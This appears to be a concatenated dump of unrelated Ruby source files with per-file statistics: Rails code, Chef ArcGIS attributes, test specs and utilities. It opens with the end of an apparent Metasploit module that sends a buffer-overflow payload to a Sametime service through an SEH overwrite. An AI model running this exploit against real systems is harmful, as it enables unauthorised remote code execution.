sock.put(req)
res = sock.get_once(-1,3) || ''
disconnect
if (res =~/200 OK/)
return Exploit::CheckCode::Detected
end
end
return Exploit::CheckCode::Safe
end
def exploit
connect
pad1 = rand_text_alpha_lower(44)
pad2 = rand_text_alpha_lower(29)
# Patrick - We should use Metasm here.
popebx = Metasm::Shellcode.assemble(Metasm::Ia32.new, "pop ebx").encode_string * target['Offset'][0]
popad = Metasm::Shellcode.assemble(Metasm::Ia32.new, "popad").encode_string * target['Offset'][1]
esp = "\xff\x24\x24" # dword ptr ss:[esp]
jmp = "\x74\x23" + "\x75\x21" # je short, jnz short
seh = [target['Ret']].pack('V')
path = pad1 + jmp + seh + pad2 + popebx + popad + esp
req = "POST /CommunityCBR/CC.39.#{path}/\r\n"
req << "User-Agent: Sametime Community Agent\r\n"
req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
req << "Content-Length: #{payload.encoded.length}\r\n"
req << "Connection: Close\r\n"
req << "Cache-Control: no-cache\r\n\r\n"
req << payload.encoded
sock.put(req)
handler
disconnect
end
end
| 28.891473 | 141 | 0.610142 |
7a619bd473d98e0e5df70eb51633b825c9d76d59 | 290 | class ExpensesController < ApplicationController
before_action :authenticate_user!
before_action :event
decorates_assigned :event
def index
@expenses_decorator = ExpensesDecorator.new(event)
end
private
def event
@event ||= Event.find(params[:event_id])
end
end
| 17.058824 | 54 | 0.751724 |
911c7fdbd0cf6e6cab43108b6ed31c60da24cc56 | 300 | class CreateReviews < ActiveRecord::Migration[6.1]
def change
create_table :reviews do |t|
t.integer :rating
t.text :description
t.references :movie, null: false, foreign_key: true
t.references :user, null: false, foreign_key: true
t.timestamps
end
end
end
| 23.076923 | 57 | 0.67 |
61d3936ba61ecd65cce06067d0f12ce9abe72ab2 | 87 | module Whatnow
class Engine < ::Rails::Engine
isolate_namespace Whatnow
end
end | 17.4 | 32 | 0.747126 |
ed7f6501a8091a7869cea3683a26669c79c06ce0 | 3,929 | # Loads an image from a file
# @param path [String]
# @return [Image]
def load_image(path)
# mrb_load_image
# src/mruby_integration/image.cpp
Image.new
end
# Unloads an image
# @param image [Image]
# @return [nil]
def unload_image(image)
# mrb_unload_image
# src/mruby_integration/image.cpp
nil
end
# Exports an image to a file
# @param image [Image]
# @param path [String]
# @return [nil]
def export_image(image, path)
# mrb_export_image
# src/mruby_integration/image.cpp
nil
end
# Generates a new image of width by height in the specified colour.
# @param width [Integer]
# @param height [Integer]
# @param colour [Colour]
# @return [Image]
def generate_image_colour(width, height, colour)
# mrb_generate_image_colour
# src/mruby_integration/image.cpp
Image.new
end
# Copies an image to a new object
# @param image [Image]
# @return [Image]
def image_copy(image)
# mrb_image_copy
# src/mruby_integration/image.cpp
Image.new
end
# Returns a subsection of an image
# @param image [Image]
# @param source [Rectangle]
# @return [Image]
def image_from_image(image, source)
# mrb_image_from_image
# src/mruby_integration/image.cpp
Image.new
end
# Creates an image from the font
# @param font [Font] Which font to draw with
# @param text [String] The text to put on the screen
# @param font_size [Integer]
# @param font_padding [Integer]
# @param colour [Colour]
# @return [Image]
def image_text_ex(font, text, font_size, font_padding, colour)
# mrb_image_text_ex
# src/mruby_integration/image.cpp
Image.new
end
# Resizes the image using a bicubic scaling algorithm. Useful for things like
# photos, not great for pixel art.
# @param image [Image]
# @param width [Integer]
# @param height [Integer]
# @return [nil]
def image_resize!(image, width, height)
# mrb_image_resize
# src/mruby_integration/image.cpp
nil
end
# Resizes the image using a nearest-neighbour scaling algorithm. Useful for things like
# pixel art, not great for photos.
# @param image [Image]
# @param width [Integer]
# @param height [Integer]
# @return [nil]
def image_resize_nearest_neighbour!(image, width, height)
# mrb_image_resize_nearest_neighbour
# src/mruby_integration/image.cpp
nil
end
# Crops the image to the section in the rectangle
# @param image [Image]
# @param rectangle [Rectangle]
# @return [nil]
def image_crop!(image, rectangle)
# mrb_image_crop
# src/mruby_integration/image.cpp
nil
end
# Applies the alpha of the mask to the image
# @param image [Image]
# @param alpha_mask [Image]
# @return [nil]
def image_alpha_mask!(image, alpha_mask)
# mrb_image_alpha_mask
# src/mruby_integration/image.cpp
nil
end
# Pre-multiplies the alpha for the image
# @param image [Image]
# @return [nil]
def image_alpha_premultiply!(image)
# mrb_image_alpha_premultiply
# src/mruby_integration/image.cpp
nil
end
# Flips the image vertically
# @param image [Image]
# @return [nil]
def image_flip_vertical!(image)
# mrb_image_flip_vertical
# src/mruby_integration/image.cpp
nil
end
# Generates mipmaps for the specified image
# @param image [Image]
# @return [nil]
def image_mipmaps!(image)
# mrb_image_mipmaps
# src/mruby_integration/image.cpp
nil
end
# Flips the image horizontally
# @param image [Image]
# @return [nil]
def image_flip_horizontal!(image)
# mrb_image_flip_horizontal
# src/mruby_integration/image.cpp
nil
end
# Rotates the image clockwise 90 degrees
# @param image [Image]
# @return [nil]
def image_rotate_cw!(image)
# mrb_image_rotate_cw
# src/mruby_integration/image.cpp
nil
end
# Rotates the image counter-clockwise 90 degrees
# @param image [Image]
# @return [nil]
def image_rotate_ccw!(image)
# mrb_image_rotate_ccw
# src/mruby_integration/image.cpp
nil
end
# Returns an Image object with the screen data
# @return [Image]
def get_screen_data()
# mrb_get_screen_data
# src/mruby_integration/image.cpp
Image.new
end
| 22.19774 | 87 | 0.741665 |
21daea6ed354e434f13826d6a6f9fb212d2b98d8 | 2,459 | # coding: utf-8
require 'active_support/concern'
module ActsAsOrderedTree
module Hooks
# This AR-hook is used in Move transactions to update parent_id, position
# and other changed attributes using single SQL-query.
#
# @example
# class Category < ActiveRecord::Base
# include ActsAsOrderedTree::Hooks
# end
#
# category = Category.first
# category.hook_update do |update|
# update.scope = Category.where(:parent_id => category.parent_id)
# update.values = { :name => Arel.sql('CASE WHEN parent_id IS NULL THEN name ELSE name || name END') }
#
# # `update.update!` will be called instead of usual `AR::Persistence#update`
# record.save
# end
#
# @api private
module Update
extend ActiveSupport::Concern
included do
attr_accessor :__update_hook
# Since rails 4.0 :update_record is used for actual updates
# Since rails 4.0.x and 4.1.x (i really don't know which is x) :_update_record is used
method_name = [:update_record, :_update_record].detect { |m| private_method_defined?(m) } || :update
alias_method :update_without_hook, method_name
alias_method method_name, :update_with_hook
end
def hook_update
self.__update_hook = UpdateManager.new(self)
yield __update_hook
ensure
self.__update_hook = nil
end
private
def update_with_hook(*args)
if __update_hook
__update_hook.update!
else
update_without_hook(*args)
end
end
class UpdateManager
attr_reader :record
attr_accessor :scope, :values
def initialize(record)
@record = record
@values = {}
end
def update!
scope.update_all(to_sql)
record.reload
end
private
def to_sql
values.keys.map do |attr|
name = attr.is_a?(Arel::Attributes::Attribute) ? attr.name : attr.to_s
quoted = record.class.connection.quote_column_name(name)
"#{quoted} = (#{value_of(attr)})"
end.join(', ')
end
def value_of(attr)
value = values[attr]
value.respond_to?(:to_sql) ? value.to_sql : record.class.connection.quote(value)
end
end # class CustomUpdate
end # module Update
end # module Hooks
end # module ActsAsOrderedTree | 28.593023 | 110 | 0.611224 |
18f7a7b5919fd8943c3e4a12b6d6b5065d928b9d | 4,428 | # coding: utf-8
module FeatureTests
module Action
module Paypal
extend Capybara::DSL
extend RSpec::Matchers
module_function
def connect_marketplace_paypal(min_price: "2.0", commission: "5", min_commission: "1.0")
topbar = FeatureTests::Section::Topbar
paypal_preferences = FeatureTests::Page::AdminPaypalPreferences
admin_sidebar = FeatureTests::Section::AdminSidebar
onboarding_wizard = FeatureTests::Section::OnboardingWizard
# Connect Paypal for admin
topbar.navigate_to_admin
admin_sidebar.click_payments_link
paypal_preferences.connect_paypal_account
expect(page).to have_content("PayPal account connected")
paypal_preferences.edit_payment_general_preferences(min_price: min_price)
paypal_preferences.click_button("Save settings")
#paypal_preferences.change_paypal_settings
paypal_preferences.edit_payment_transaction_fee_preferences(commission: commission, min_commission: min_commission)
paypal_preferences.click_button("Save")
onboarding_wizard.dismiss_dialog
expect(page).to have_content("Transaction fee settings updated")
end
def connect_seller_paypal
topbar = FeatureTests::Section::Topbar
settings_sidebar = FeatureTests::Section::UserSettingsSidebar
paypal_preferences = FeatureTests::Page::UserSettingsPayments
# Connect Paypal for seller
topbar.open_user_menu
topbar.click_settings
settings_sidebar.click_payments_link
paypal_preferences.connect_paypal_account
expect(page).to have_content("PayPal account connected")
# Grant commission fee
paypal_preferences.grant_permission
expect(page).to have_content("Hooray, everything is set up!")
end
def request_listing(title:, expected_price: nil)
home = FeatureTests::Page::Home
listing = FeatureTests::Page::Listing
listing_book = FeatureTests::Page::ListingBook
topbar = FeatureTests::Section::Topbar
worker = FeatureTests::Worker
topbar.click_logo
home.click_listing(title)
listing.fill_in_booking_dates
listing.click_request
expect(page).to have_content("Buy #{title}")
listing_book.fill_in_message("Snowman ☃ sells: #{title}")
if expected_price.present?
# listing.fill_in_booking_dates always selects a two day period
# expect(page).to have_content("(2 days)")
expect(listing_book.total_value).to have_content("$#{expected_price}")
end
listing_book.proceed_to_payment
worker.work_until do
begin
page.has_content?("Payment authorized") &&
page.has_content?("Snowman ☃ sells: #{title}")
rescue Selenium::WebDriver::Error::StaleElementReferenceError
false
end
end
end
def accept_listing_request
topbar = FeatureTests::Section::Topbar
topbar.click_inbox
# Inbox
expect(page).to have_content("Waiting for you to accept the request")
page.click_link("Payment authorized")
# Transaction conversation page
page.click_link("Accept request")
# Order details page
page.click_button("Accept")
expect(page).to have_content("Request accepted")
expect(page).to have_content("Payment successful")
end
def buyer_mark_completed
topbar = FeatureTests::Section::Topbar
topbar.click_inbox
# Transaction conversation page
expect(page).to have_content("Waiting for you to mark the order completed")
page.click_link("accepted the request, received payment for")
page.click_link("Mark completed")
choose("Skip feedback")
page.click_button("Continue")
expect(page).to have_content("Offer completed")
expect(page).to have_content("Feedback skipped")
end
def seller_mark_completed
topbar = FeatureTests::Section::Topbar
topbar.click_inbox
# Transaction conversation page
expect(page).to have_content("Waiting for you to give feedback")
page.click_link("marked the order as completed")
page.click_link("Skip feedback")
expect(page).to have_content("Feedback skipped")
end
end
end
end
| 32.8 | 123 | 0.678184 |
1d9d21a64b69e6993e9d67e654dfce613fd9f448 | 132 | class AddPublicToAccessLevel < ActiveRecord::Migration[4.2]
def change
add_column :access_levels, :public, :boolean
end
end
| 22 | 59 | 0.765152 |
f727580b3801994c9051d38169787a7e965ad463 | 3,778 | require 'test_helper'
describe "Fog::Network[:telefonica] | lb_health_monitor requests" do
before do
@lb_health_monitor_format = {
'id' => String,
'type' => String,
'delay' => Integer,
'timeout' => Integer,
'max_retries' => Integer,
'http_method' => String,
'url_path' => String,
'expected_codes' => String,
'status' => String,
'admin_state_up' => Fog::Boolean,
'tenant_id' => String
}
end
describe "success" do
before do
@lb_pool = network.lb_pools.create(
:subnet_id => 'subnet_id',
:protocol => 'HTTP',
:lb_method => 'ROUND_ROBIN'
)
type = 'PING'
delay = 1
timeout = 5
max_retries = 10
attributes = {
:http_method => 'GET',
:url_path => '/',
:expected_codes => '200, 201',
:admin_state_up => true,
:tenant_id => 'tenant_id'
}
@lb_health_monitor = network.create_lb_health_monitor(
type, delay, timeout, max_retries, attributes
).body
end
after do
@lb_pool.destroy
end
it "#create_lb_health_monitor" do
@lb_health_monitor.must_match_schema('health_monitor' => @lb_health_monitor_format)
end
it "#list_lb_health_monitors" do
network.list_lb_health_monitors.body.
must_match_schema('health_monitors' => [@lb_health_monitor_format])
end
it "#get_lb_health_monitor" do
lb_health_monitor_id = network.lb_health_monitors.all.first.id
network.get_lb_health_monitor(lb_health_monitor_id).body.
must_match_schema('health_monitor' => @lb_health_monitor_format)
end
it "#update_lb_health_monitor" do
lb_health_monitor_id = network.lb_health_monitors.all.first.id
attributes = {
:delay => 5,
:timeout => 10,
:max_retries => 20,
:http_method => 'POST',
:url_path => '/varz',
:expected_codes => '200',
:admin_state_up => false
}
network.update_lb_health_monitor(lb_health_monitor_id, attributes).body.
must_match_schema('health_monitor' => @lb_health_monitor_format)
end
it "#associate_lb_health_monitor" do
lb_health_monitor_id = network.lb_health_monitors.all.first.id
network.associate_lb_health_monitor(@lb_pool.id, lb_health_monitor_id).status.must_equal 200
end
it "#disassociate_lb_health_monitor" do
lb_health_monitor_id = network.lb_health_monitors.all.first.id
network.disassociate_lb_health_monitor(@lb_pool.id, lb_health_monitor_id).status.must_equal 204
end
it "#delete_lb_health_monitor" do
lb_health_monitor_id = network.lb_health_monitors.all.first.id
network.delete_lb_health_monitor(lb_health_monitor_id).status.must_equal 204
end
end
describe "failure" do
it "#get_lb_health_monitor" do
proc do
network.get_lb_health_monitor(0)
end.must_raise Fog::Network::Telefonica::NotFound
end
it "#update_lb_health_monitor" do
proc do
network.update_lb_health_monitor(0, {})
end.must_raise Fog::Network::Telefonica::NotFound
end
it "#associate_lb_health_monitor" do
proc do
network.associate_lb_health_monitor(0, 0)
end.must_raise Fog::Network::Telefonica::NotFound
end
it "#disassociate_lb_health_monitor" do
proc do
network.disassociate_lb_health_monitor(0, 0)
end.must_raise Fog::Network::Telefonica::NotFound
end
it "#delete_lb_health_monitor" do
proc do
network.delete_lb_health_monitor(0)
end.must_raise Fog::Network::Telefonica::NotFound
end
end
end
| 29.286822 | 101 | 0.642668 |
edc586fbcff31fb0d6c07f0f88da14031922dd93 | 1,092 | # As aun unauthorized user
# I want to unsign pendings reports
# In order to be able to update a report again
feature 'Unsign Report' do
scenario 'when pending' do
user = create(:unauthorized_user)
login_as user, scope: :user
report = create(:verified_report, user: user)
expect(report).not_to be_updatable
visit report_url(report)
click_link 'Vidierung löschen'
report.reload
expect(report).to be_updatable
expect(current_path).to eq report_path(report)
end
scenario 'when released' do
user = create(:unauthorized_user)
login_as user, scope: :user
report = create(:verified_report, user: user)
create(:report_release, report: report)
visit report_url(report)
expect(page).not_to have_content('Vidierung löschen')
end
scenario 'when signed by other user' do
user = create(:unauthorized_user)
other = create(:unauthorized_user)
login_as user, scope: :user
report = create(:verified_report, user: other)
visit report_url(report)
expect(page).not_to have_content('Vidierung löschen')
end
end
| 27.3 | 57 | 0.718864 |
f8aa2ef562900de55b01e735045d53fe82a21e66 | 94 | json.extract! @employee_shift, :id, :company_shift_id, :employee_id, :created_at, :updated_at
| 47 | 93 | 0.787234 |
08c507c247823804c2366e2f6e58dca521eee292 | 2,170 | ##
## Executes a recursive grep in the current directory to find all todos,
## and the respecitve filename and linenumber. If there's a .gitignore
## that function will ignore all directories and files from .gitignore
##
def get_lines
exclude = ''
if File.file?(".gitignore")
exclude = `cat .gitignore`.split("\n").map { |l| " | grep -v '^#{l}'" }
exclude = exclude.join
end
`egrep -rnH 'TODO|FIXME|XXX' * | grep -v '^Binary file' #{exclude}`.split("\n")
end
##
## Builds a code sample from the given file and linenumber. Will display
## the 4 lines above and below the relevant line and will highlight the
## relevant line.
##
def code_sample(file, line)
line = line.to_i
from = line - 4
from = 0 if from < 0
result = "\n\n"
snippet(file, from, line + 4).split("\n").each do |code_line|
active = (line == from)
spaces = " " * (8 - from.to_s.length - (active ? 3 : 0))
result << spaces + (active ? '>> '.bold.red : '')
result << from.to_s.bold.yellow + ": ".bold.yellow
first = true
if code_line.length > 0
scan = code_line.scan(/^ +/)[0]
ident = scan ? scan.length + 12 : 12
code_line.scan(/.{1,80}/m).each do |l|
result << (first ? '' : ' ' * ident) + (active ? l.bold.red : l) + "\n"
first = false
end
else
result << "\n"
end
from += 1
end
result
end
##
## Extracs a code snippet from a file and reduced the identation to the minimum
##
def snippet(file, from, to)
code = ""
current_line = 0
File.open(file, 'r') do |f|
while read_line = f.gets
current_line += 1
code << read_line.gsub(/\t/m, ' ') if current_line >= from && current_line <= to
end
end
code.gsub(/^#{code.scan(/^ +/).min}/, '')
end
##
## Reduces the identation of a given string to the minimum
##
def unindent(code)
code.gsub(/^#{scan(/^\s+/).min}/, "")
end
##
## Register the check script
##
check do
todos = get_lines.map do |line|
splitted = line.split(':', 3)
result = "Found a ToDo in #{splitted[0]} at line #{splitted[1]}:\n"
result << code_sample(splitted[0], splitted[1])
result
end
todos.sample
end
| 20.666667 | 87 | 0.594931 |
e25f1d0f45d76a8d51ea66a0c9e0491f3f5c0cf6 | 2,873 | # frozen_string_literal: true
require 'jiji/test/test_configuration'
require 'jiji/test/data_builder'
describe Jiji::Model::Trading::Rate do
include_context 'use data_builder'
it 'tickから作成できる' do
rate1 = Jiji::Model::Trading::Rate.create_from_tick(:EURJPY,
data_builder.new_tick(1, Time.new(2014, 1, 1, 0, 0, 0)),
data_builder.new_tick(2, Time.new(2014, 2, 1, 0, 0, 0)),
data_builder.new_tick(3, Time.new(2014, 1, 1, 0, 0, 1)),
data_builder.new_tick(10, Time.new(2014, 1, 10, 0, 0, 0)),
data_builder.new_tick(-10, Time.new(2014, 1, 21, 0, 0, 0))
)
expect(rate1.pair).to eq(:EURJPY)
expect(rate1.open.bid).to eq(101)
expect(rate1.open.ask).to eq(101.003)
expect(rate1.close.bid).to eq(102)
expect(rate1.close.ask).to eq(102.003)
expect(rate1.high.bid).to eq(110)
expect(rate1.high.ask).to eq(110.003)
expect(rate1.low.bid).to eq(90)
expect(rate1.low.ask).to eq(90.003)
expect(rate1.timestamp).to eq(Time.new(2014, 1, 1, 0, 0, 0))
end
it 'すべての値が同一である場合、同一とみなされる' do
rate1 = data_builder.new_rate(1)
rate2 = data_builder.new_rate(2)
expect(rate1 == rate2).to eq(false)
expect(rate1 == data_builder.new_rate(1)).to eq(true)
expect(rate1.eql?(rate2)).to eq(false)
expect(rate1.eql?(rate1)).to eq(true)
expect(rate1.eql?(data_builder.new_rate(1))).to eq(true)
expect(rate1.equal?(rate2)).to eq(false)
expect(rate1.equal?(rate1)).to eq(true)
expect(rate1.equal?(data_builder.new_rate(1))).to eq(false)
end
it 'clone で複製ができる' do
rate1 = data_builder.new_rate(1)
clone = rate1.clone
expect(rate1 == clone).to eq(true)
expect(rate1.eql?(clone)).to eq(true)
expect(rate1.equal?(clone)).to eq(false)
end
it 'unionで統合できる' do
rate1 = Jiji::Model::Trading::Rate.create_from_tick(:USDJPY,
data_builder.new_tick(1, Time.new(2014, 1, 3, 0, 0, 0)),
data_builder.new_tick(2, Time.new(2014, 2, 1, 0, 0, 0))
)
rate2 = Jiji::Model::Trading::Rate.create_from_tick(:USDJPY,
data_builder.new_tick(4, Time.new(2014, 1, 1, 0, 0, 0)),
data_builder.new_tick(5, Time.new(2014, 1, 2, 0, 0, 0))
)
rate3 = Jiji::Model::Trading::Rate.create_from_tick(:USDJPY,
data_builder.new_tick(6, Time.new(2014, 4, 3, 0, 0, 0)),
data_builder.new_tick(7, Time.new(2014, 3, 1, 0, 0, 0))
)
rate = Jiji::Model::Trading::Rate.union(rate1, rate2, rate3)
expect(rate.pair).to eq(:USDJPY)
expect(rate.open.bid).to eq(104)
expect(rate.open.ask).to eq(104.003)
expect(rate.close.bid).to eq(106)
expect(rate.close.ask).to eq(106.003)
expect(rate.high.bid).to eq(107)
expect(rate.high.ask).to eq(107.003)
expect(rate.low.bid).to eq(101)
expect(rate.low.ask).to eq(101.003)
expect(rate.timestamp).to eq(Time.new(2014, 1, 1, 0, 0, 0))
end
end
| 35.036585 | 65 | 0.646711 |
e9b60aeab5ed66d960c04dee9550851ed1396861 | 10,793 | #
# Cookbook Name:: arcgis-enterprise
# Attributes:: webadaptor
#
# Copyright 2018 Esri
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
default['arcgis']['web_adaptor'].tap do |web_adaptor|
web_adaptor['admin_access'] = false
web_adaptor['install_system_requirements'] = true
web_adaptor['setup_archive'] = ''
web_adaptor['product_code'] = ''
web_adaptor['product_code2'] = ''
web_adaptor['config_web_adaptor_exe'] = '\\ArcGIS\\WebAdaptor\\IIS\\Tools\\ConfigureWebAdaptor.exe'
case node['platform']
when 'windows'
web_adaptor['setup'] = ::File.join(node['arcgis']['repository']['setups'],
"ArcGIS #{node['arcgis']['version']}",
'WebAdaptorIIS', 'Setup.exe').gsub('/', '\\')
web_adaptor['lp-setup'] = node['arcgis']['web_adaptor']['setup']
web_adaptor['install_dir'] = ''
case node['arcgis']['version']
when '10.8.1'
web_adaptor['setup_archive'] = ::File.join(node['arcgis']['repository']['archives'],
'ArcGIS_Web_Adaptor_for_Microsoft_IIS_1081_175217.exe').gsub('/', '\\')
web_adaptor['product_code'] = '{9695EF78-A2A8-4383-AFBF-627C55FE31DC}'
web_adaptor['product_code2'] = '{56F26E70-2C61-45BC-A624-E100175086F7}'
web_adaptor['config_web_adaptor_exe'] = '\\ArcGIS\\WebAdaptor\\IIS\\10.8.1\\Tools\\ConfigureWebAdaptor.exe'
when '10.8'
web_adaptor['setup_archive'] = ::File.join(node['arcgis']['repository']['archives'],
'Web_Adaptor_for_Microsoft_IIS_108_172749.exe').gsub('/', '\\')
web_adaptor['product_code'] = '{D6059C27-7199-4A94-806B-6C40EFD02828}'
web_adaptor['product_code2'] = '{E77ED9CA-7DC8-45FC-A8BB-57AD2096EF8A}'
web_adaptor['config_web_adaptor_exe'] = '\\ArcGIS\\WebAdaptor\\IIS\\10.8\\Tools\\ConfigureWebAdaptor.exe'
when '10.7.1'
web_adaptor['setup_archive'] = ::File.join(node['arcgis']['repository']['archives'],
'Web_Adaptor_for_Microsoft_IIS_1071_169690.exe').gsub('/', '\\')
web_adaptor['product_code'] = '{5ECEF84F-592C-47D1-B7C5-9F3D7E2AB7CE}'
web_adaptor['product_code2'] = '{5F1D01EA-296E-4226-A704-6A90E2916782}'
web_adaptor['config_web_adaptor_exe'] = '\\ArcGIS\\WebAdaptor\\IIS\\10.7.1\\Tools\\ConfigureWebAdaptor.exe'
when '10.7'
web_adaptor['setup_archive'] = ::File.join(node['arcgis']['repository']['archives'],
'Web_Adaptor_for_Microsoft_IIS_107_167634.exe').gsub('/', '\\')
web_adaptor['product_code'] = '{F343B520-F769-4D93-86D2-663168AC6975}'
web_adaptor['product_code2'] = '{58A76431-E1A9-4D11-BB89-0D12C6E77C78}'
web_adaptor['config_web_adaptor_exe'] = '\\ArcGIS\\WebAdaptor\\IIS\\10.7\\Tools\\ConfigureWebAdaptor.exe'
when '10.6.1'
web_adaptor['setup_archive'] = ::File.join(node['arcgis']['repository']['archives'],
'Web_Adaptor_for_Microsoft_IIS_1061_163981.exe').gsub('/', '\\')
web_adaptor['product_code'] = '{1B4E7470-72F4-4169-92B9-EF1BDF8AE4AF}'
web_adaptor['product_code2'] = '{3FA8B44E-E0E3-4245-A662-6B81E1E75048}'
Chef::Log.warn 'Unsupported ArcGIS Web Adaptor version'
when '10.6'
web_adaptor['setup_archive'] = ::File.join(node['arcgis']['repository']['archives'],
'Web_Adaptor_for_Microsoft_IIS_106_161833.exe').gsub('/', '\\')
web_adaptor['product_code'] = '{4FB9D475-9A23-478D-B9F7-05EBA2073FC7}'
web_adaptor['product_code2'] = '{38DBD944-7F0E-48EB-9DCB-98A0567FB062}'
Chef::Log.warn 'Unsupported ArcGIS Web Adaptor version'
when '10.5.1'
web_adaptor['setup_archive'] = ::File.join(node['arcgis']['repository']['archives'],
'Web_Adaptor_for_Microsoft_IIS_1051_156367.exe').gsub('/', '\\')
web_adaptor['product_code'] = '{0A9DA130-E764-485F-8C1A-AD78B04AA7A4}'
web_adaptor['product_code2'] = '{B8A6A873-ED78-47CE-A9B4-AB3192C47604}'
Chef::Log.warn 'Unsupported ArcGIS Web Adaptor version'
when '10.5'
web_adaptor['setup_archive'] = ::File.join(node['arcgis']['repository']['archives'],
'Web_Adaptor_for_Microsoft_IIS_105_154007.exe').gsub('/', '\\')
web_adaptor['product_code'] = '{87B4BD93-A5E5-469E-9224-8A289C6B2F10}'
web_adaptor['product_code2'] = '{604CF558-B7E1-4271-8543-75E260080DFA}'
Chef::Log.warn 'Unsupported ArcGIS Web Adaptor version'
when '10.4.1'
web_adaptor['setup_archive'] = ::File.join(node['arcgis']['repository']['archives'],
'Web_Adaptor_for_Microsoft_IIS_1041_151933.exe').gsub('/', '\\')
web_adaptor['product_code'] = '{F53FEE2B-54DD-4A6F-8545-6865F4FBF6DC}'
web_adaptor['product_code2'] = '{475ACDE5-D140-4F10-9006-C804CA93D2EF}'
Chef::Log.warn 'Unsupported ArcGIS Web Adaptor version'
when '10.4'
web_adaptor['setup_archive'] = ::File.join(node['arcgis']['repository']['archives'],
'Web_Adaptor_for_Microsoft_IIS_104_149435.exe').gsub('/', '\\')
web_adaptor['product_code'] = '{B83D9E06-B57C-4B26-BF7A-004BE10AB2D5}'
web_adaptor['product_code2'] = '{E2C783F3-6F85-4B49-BFCD-6D6A57A2CFCE}'
Chef::Log.warn 'Unsupported ArcGIS Web Adaptor version'
else
Chef::Log.warn 'Unsupported ArcGIS Web Adaptor version'
end
web_adaptor['product_codes'] = ['{B83D9E06-B57C-4B26-BF7A-004BE10AB2D5}',
'{E2C783F3-6F85-4B49-BFCD-6D6A57A2CFCE}',
'{F53FEE2B-54DD-4A6F-8545-6865F4FBF6DC}',
'{475ACDE5-D140-4F10-9006-C804CA93D2EF}',
'{87B4BD93-A5E5-469E-9224-8A289C6B2F10}',
'{604CF558-B7E1-4271-8543-75E260080DFA}',
'{0A9DA130-E764-485F-8C1A-AD78B04AA7A4}',
'{B8A6A873-ED78-47CE-A9B4-AB3192C47604}',
'{4FB9D475-9A23-478D-B9F7-05EBA2073FC7}',
'{38DBD944-7F0E-48EB-9DCB-98A0567FB062}',
'{1B4E7470-72F4-4169-92B9-EF1BDF8AE4AF}',
'{3FA8B44E-E0E3-4245-A662-6B81E1E75048}',
'{F343B520-F769-4D93-86D2-663168AC6975}',
'{58A76431-E1A9-4D11-BB89-0D12C6E77C78}',
'{5ECEF84F-592C-47D1-B7C5-9F3D7E2AB7CE}',
'{5F1D01EA-296E-4226-A704-6A90E2916782}',
'{D6059C27-7199-4A94-806B-6C40EFD02828}',
'{E77ED9CA-7DC8-45FC-A8BB-57AD2096EF8A}',
'{9695EF78-A2A8-4383-AFBF-627C55FE31DC}',
'{56F26E70-2C61-45BC-A624-E100175086F7}']
else # node['platform'] == 'linux'
web_adaptor['setup'] = ::File.join(node['arcgis']['repository']['setups'],
node['arcgis']['version'],
'WebAdaptor', 'Setup')
web_adaptor['lp-setup'] = node['arcgis']['web_adaptor']['setup']
case node['arcgis']['version']
when '10.8.1'
web_adaptor['setup_archive'] = ::File.join(node['arcgis']['repository']['archives'],
'ArcGIS_Web_Adaptor_Java_Linux_1081_175313.tar.gz')
when '10.8'
web_adaptor['setup_archive'] = ::File.join(node['arcgis']['repository']['archives'],
'Web_Adaptor_Java_Linux_108_172992.tar.gz')
when '10.7.1'
web_adaptor['setup_archive'] = ::File.join(node['arcgis']['repository']['archives'],
'Web_Adaptor_Java_Linux_1071_169645.tar.gz')
when '10.7'
web_adaptor['setup_archive'] = ::File.join(node['arcgis']['repository']['archives'],
'Web_Adaptor_Java_Linux_107_167720.tar.gz')
when '10.6.1'
web_adaptor['setup_archive'] = ::File.join(node['arcgis']['repository']['archives'],
'Web_Adaptor_Java_Linux_1061_164057.tar.gz')
Chef::Log.warn 'Unsupported ArcGIS Web Adaptor version'
when '10.6'
web_adaptor['setup_archive'] = ::File.join(node['arcgis']['repository']['archives'],
'Web_Adaptor_Java_Linux_106_161911.tar.gz')
Chef::Log.warn 'Unsupported ArcGIS Web Adaptor version'
when '10.5.1'
web_adaptor['setup_archive'] = ::File.join(node['arcgis']['repository']['archives'],
'Web_Adaptor_Java_Linux_1051_156442.tar.gz')
Chef::Log.warn 'Unsupported ArcGIS Web Adaptor version'
when '10.5'
web_adaptor['setup_archive'] = ::File.join(node['arcgis']['repository']['archives'],
'Web_Adaptor_Java_Linux_105_154055.tar.gz')
Chef::Log.warn 'Unsupported ArcGIS Web Adaptor version'
when '10.4.1'
web_adaptor['setup_archive'] = ::File.join(node['arcgis']['repository']['archives'],
'Web_Adaptor_Java_Linux_1041_152000.tar.gz')
Chef::Log.warn 'Unsupported ArcGIS Web Adaptor version'
when '10.4'
web_adaptor['setup_archive'] = ::File.join(node['arcgis']['repository']['archives'],
'Web_Adaptor_Java_Linux_104_149448.tar.gz')
Chef::Log.warn 'Unsupported ArcGIS Web Adaptor version'
else
Chef::Log.warn 'Unsupported ArcGIS Web Adaptor version'
end
web_adaptor['install_dir'] = '/'
web_adaptor['install_subdir'] = "arcgis/webadaptor#{node['arcgis']['version']}"
end
web_adaptor['setup_options'] = ''
# Starting from ArcGIS 10.8.1 Web Adaptor registration supports 'ReindexPortalContent' option.
web_adaptor['reindex_portal_content'] = true
end
| 60.977401 | 120 | 0.585379 |
e8e46593376f7968b6f84c4cd7958f6db75c6121 | 1,424 | require_relative 'boot'
require "rails"
# Pick the frameworks you want:
require "active_model/railtie"
require "active_job/railtie"
require "active_record/railtie"
require "active_storage/engine"
require "action_controller/railtie"
require "action_mailer/railtie"
require "action_view/railtie"
require "action_cable/engine"
# require "sprockets/railtie"
require "rails/test_unit/railtie"
# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(*Rails.groups)
module Pokeapi
class Application < Rails::Application
# Initialize configuration defaults for originally generated Rails version.
config.load_defaults 5.2
# Settings in config/environments/* take precedence over those specified here.
# Application configuration can go into files in config/initializers
# -- all .rb files in that directory are automatically loaded after loading
# the framework and any gems in your application.
# Only loads a smaller set of middleware suitable for API only apps.
# Middleware like session, flash, cookies can be added back manually.
# Skip views, helpers and assets when generating a new resource.
config.api_only = true
